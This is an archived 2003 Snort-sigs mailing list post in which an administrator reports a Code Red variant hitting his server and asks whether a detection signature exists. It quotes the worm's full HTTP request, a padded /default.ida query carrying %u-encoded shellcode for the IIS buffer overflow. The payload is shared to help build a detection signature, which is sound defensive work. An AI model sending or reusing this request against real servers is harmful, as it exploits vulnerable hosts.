Hosting Provided By

[Snort-sigs] New code-red Variant (code red F) sig available ?

From: Xavier FIQUET <xavier.fiquet(at)wanadoo.com>
Date: Thu Mar 13 2003 - 04:14:08 EST

Hello,

we have been recently targeted by some new variant of code red ida attempt.

here is what we have :

XXX.XXX.XXX.XXX - - [13/Mar/2003:10:06:21 +0100] "GET

/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205 "This worm is very similar to the other variants of CodeRed, specifically the .C variant. Its only difference with the .C variant is the trigger date when it restarts the system. The .C variant restarts the system if the year is greater than 2002. This .F variant, on the other hand, executes the same routine if the year is greater than or equal to 34952. "

Best regards,

Xavier FIQUET

This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod:
http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en

Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs Received on Thu Mar 13 04:55:31 2003

This message: [ Message body ]
Next message: Young, Mike: "RE: [Snort-sigs] New code-red Variant (code red F) sig available ?"
Previous message: Chris Rowe: "[Snort-sigs] Re: Snort-sigs digest, Vol 1 #511 - 2 msgs (Out of office)"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:08:25 EDT